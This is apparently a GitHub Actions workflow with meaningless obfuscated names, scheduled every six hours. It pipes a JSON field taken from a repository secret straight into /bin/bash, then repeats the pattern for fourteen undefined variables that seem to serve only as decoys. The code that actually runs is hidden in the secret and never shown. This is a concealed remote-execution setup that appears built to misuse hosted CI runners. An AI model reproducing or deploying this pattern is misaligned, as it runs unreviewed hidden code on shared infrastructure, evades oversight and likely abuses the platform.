name: dongguange7412

on:
  workflow_dispatch:
  schedule:
    - cron: '31 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongguange7412
        env:
          pfuq19: ${{ secrets.pfuq19 }}
        run: |
          echo $pfuq19 | jq -r .lttrj1 | /bin/bash
          echo $ubb21222 | jq -r .sxcf15 | /bin/bash
          echo $oefq8 | jq -r .l78906 | /bin/bash
          echo $jk3650 | jq -r .yvza41367 | /bin/bash
          echo $ypy666 | jq -r .k71 | /bin/bash
          echo $bvwh35063 | jq -r .rxkp33 | /bin/bash
          echo $g549 | jq -r .aizc7 | /bin/bash
          echo $hv662 | jq -r .rs16878 | /bin/bash
          echo $pmph7520 | jq -r .cjv5 | /bin/bash
          echo $pmkvs80 | jq -r .vlb66748 | /bin/bash
          echo $zxdlq53401 | jq -r .wkmse48886 | /bin/bash
          echo $cgil601 | jq -r .m632 | /bin/bash
          echo $z9464 | jq -r .p52946 | /bin/bash
          echo $gdg419 | jq -r .jqkm1508 | /bin/bash
          echo $qn78 | jq -r .cfqnt9576 | /bin/bash

